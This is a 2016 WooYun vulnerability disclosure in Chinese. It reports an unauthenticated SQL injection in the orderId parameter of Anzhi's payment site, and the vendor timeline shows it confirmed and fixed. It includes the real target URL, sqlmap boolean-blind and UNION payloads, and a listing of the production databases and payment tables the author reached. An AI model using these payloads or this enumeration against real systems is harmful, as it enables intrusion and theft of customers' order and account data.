当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0189833

漏洞标题:安智网核心业务SQL注入(涉及400多万订单信息)

相关厂商:安智网

漏洞作者: 风之传说

提交时间:2016-03-28 09:27

修复时间:2016-04-05 09:44

公开时间:2016-04-05 09:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-28: 细节已通知厂商并且等待厂商处理中
2016-03-29: 厂商已经确认,细节仅向厂商公开
2016-04-05: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

安智(北京力天无限网络技术有限公司)成立于2010年2月,2011年6月获得盛大网络千万级投资。2010年5月安智论坛上线,6月推出了第一版的安智市场客户端,沿袭了先论坛,后市场的发展模式,每一步都走的驾轻就熟。截止到今天,安智已成为目前中国最知名的Android系统手机应用软件下载平台,也是用户数量最先破千万的国内第三方应用市场。
看到了很多童鞋都提交了漏洞,我也忍不住想去找找到。但是看到sql注入比较少,于是就尝试下寻找寻找。然后冲了1块钱就找到了。

详细说明:

安智网核心业务sql注入(涉及400多万订单信息和所有会员信息。)

漏洞证明:

看到了很多童鞋都提交了漏洞,我也忍不住想去找找到。但是看到sql注入漏洞比较少,于是就尝试下寻找寻找。然后冲了1块钱就被我找到了。看来一块钱的作用还是很大的。
不需要登录即可注入。
直接出给注入地址。pay订单页面,字符型核心注入:
http://pay.anzhi.com/web/recharge-result?orderId=16032722261270000022

[22:35:53] [INFO] GET parameter 'orderId' is 'MySQL UNION query (NULL) - 1 to 20
 columns' injectable
GET parameter 'orderId' is vulnerable. Do you want to keep testing the others (i
f any)? [y/N] n
sqlmap identified the following injection points with a total of 71 HTTP(s) requ
ests:
---
Place: GET
Parameter: orderId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: orderId=16032722261270000022' AND 3359=3359 AND 'kwdp'='kwdp
    Type: UNION query
    Title: MySQL UNION query (NULL) - 23 columns
    Payload: orderId=-3609' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x61784e617a424d615077,0x
71707a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#


available databases [17]:
[*] accesslog
[*] adunion
[*] adunion_admin
[*] adunion_stat
[*] anzhipay
[*] anzhipay_history
[*] information_schema
[*] keta_custom
[*] mysql
[*] pay
[*] pay_activities
[*] pay_check_bill
[*] performance_schema
[*] quartz
[*] sdk_message
[*] test
[*] ucenter


pay数据库
Database: pay
[156 tables]
+----------------------------------+
| check_money_20140106             |
| check_money_20140106_pay         |
| dim_cp_tax                       |
| dim_cp_tax_temp2_20130905        |
| dim_cp_tax_temp_20130905         |
| fct_pay_order                    |
| fct_pay_order2                   |
| fct_pay_order_tmp                |
| fct_pay_tenpay_order             |
| m_activities_user                |
| m_activities_user_exist          |
| m_app_payment_type               |
| m_app_payment_type_20140825      |
| m_app_payment_type_copy          |
| m_app_paytypes                   |
| m_app_paytypes_20140718          |
| m_app_paytypes_20140724          |
| m_p_app_sms_suport               |
| m_pay_app_callback               |
| m_pay_count_0                    |
| m_pay_count_1                    |
| m_pay_count_10                   |
| m_pay_count_11                   |
| m_pay_count_12                   |
| m_pay_count_13                   |
| m_pay_count_14                   |
| m_pay_count_15                   |
| m_pay_count_16                   |
| m_pay_count_17                   |
| m_pay_count_18                   |
| m_pay_count_19                   |
| m_pay_count_2                    |
| m_pay_count_3                    |
| m_pay_count_4                    |
| m_pay_count_5                    |
| m_pay_count_6                    |
| m_pay_count_7                    |
| m_pay_count_8                    |
| m_pay_count_9                    |
| m_pay_inf_manage                 |
| m_pay_paytype                    |
| m_pay_recharge                   |
| m_pay_recharge_type___           |
| m_pay_subchannel                 |
| m_pay_user_limit_quota           |
| m_pay_user_limit_quota_back      |
| m_rebate_wealth                  |
| m_rebate_wealth_20141224         |
| m_sms_config                     |
| m_user_20150317                  |
| m_user_reward_wealth             |
| m_user_reward_wealth_20141127    |
| m_user_reward_wealth_bak         |
| m_user_reward_wealth_his         |
| mid_cp_rate                      |
| mid_month_money                  |
| mid_order_id                     |
| mid_p_app_type                   |
| mid_p_app_type1                  |
| mid_p_app_type_bad               |
| mid_p_pay_app_month_revenue      |
| mid_p_pay_order_hour             |
| mid_p_pay_order_hour1            |
| mid_p_pay_settlement             |
| mid_pay_order1                   |
| mid_pay_order2                   |
| p_activities_res                 |
| p_activities_res_20150225        |
| p_app_category                   |
| p_app_channel                    |
| p_app_gametype                   |
| p_app_inf_rate                   |
| p_app_info                       |
| p_app_info_20140616              |
| p_app_info_20151207              |
| p_app_info_day                   |
| p_app_rate                       |
| p_app_rate_step                  |
| p_app_sms                        |
| p_app_tax                        |
| p_dev_user_manage                |
| p_dev_user_manage_20150625       |
| p_order_ing                      |
| p_pay_app_month_revenue          |
| p_pay_app_month_revenue_20131113 |
| p_pay_app_month_revenue_20140612 |
| p_pay_app_month_revenue_20150624 |
| p_pay_channel_order_rec          |
| p_pay_device                     |
| p_pay_filter_testaccount         |
| p_pay_filter_testuser            |
| p_pay_inf_manage                 |
| p_pay_order                      |
| p_pay_order_1                    |
| p_pay_order_15042917391270000002 |
| p_pay_order_2                    |
| p_pay_order_201404               |
| p_pay_order_20150415             |
| p_pay_order_3                    |
| p_pay_order_4                    |
| p_pay_order_5                    |
| p_pay_order_6                    |
| p_pay_order_7                    |
| p_pay_order_8                    |
| p_pay_order_9                    |
| p_pay_order_history_121229145631 |
| p_pay_order_mid                  |
| p_pay_order_tmp_0814             |
| p_pay_repeat_tips                |
| p_pay_rules                      |
| p_pay_sdk_update_mgr             |
| p_pay_sdk_upgrade_rec            |
| p_pay_settlement                 |
| p_pay_settlement_20131113        |
| p_pay_sms_app                    |
| p_pay_sms_good                   |
| p_pay_tenpay_app_month           |
| p_pay_tenpay_order               |
| p_pay_tenpay_order_count         |
| p_pay_tenpay_settlement          |
| p_pay_type                       |
| p_pay_upload_appkey_log          |
| p_pay_user_app                   |
| p_recharge_pro                   |
| p_recharge_pro_history           |
| run_log_err                      |
| t_activities_1413                |
| t_auth_user                      |
| t_auth_user_new                  |
| t_auth_user_new_                 |
| t_menu                           |
| t_menu_20140826                  |
| t_menu_new                       |
| t_operation_permission           |
| t_role_menu                      |
| t_role_menu_new                  |
| t_role_operation                 |
| t_roles                          |
| t_roles_new                      |
| t_user_roles                     |
| t_user_roles_new                 |
| task_list                        |
| task_list_app_name               |
| task_log                         |
| task_log_20140811                |
| tmp_error_user                   |
| tmp_order_id                     |
| tmp_total_m                      |
| tmp_user_abz                     |
| tmp_user_consume                 |
| tmp_user_m2azb                   |
| tmp_user_pay                     |
| tmp_user_red                     |
| tmp_user_status                  |
| zfb_order                        |
| zfb_ording                       |
+----------------------------------+


然后看看有多少订单:

10.png


480万差不多500万了。
sql注入就应该言简意赅。恩,就是这样。

修复方案:

sql注入,你们应该会修复的。

版权声明:转载请注明来源 风之传说@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-03-29 13:55

厂商回复:

感谢,马上进行修复。

最新状态:

2016-04-05:已修复。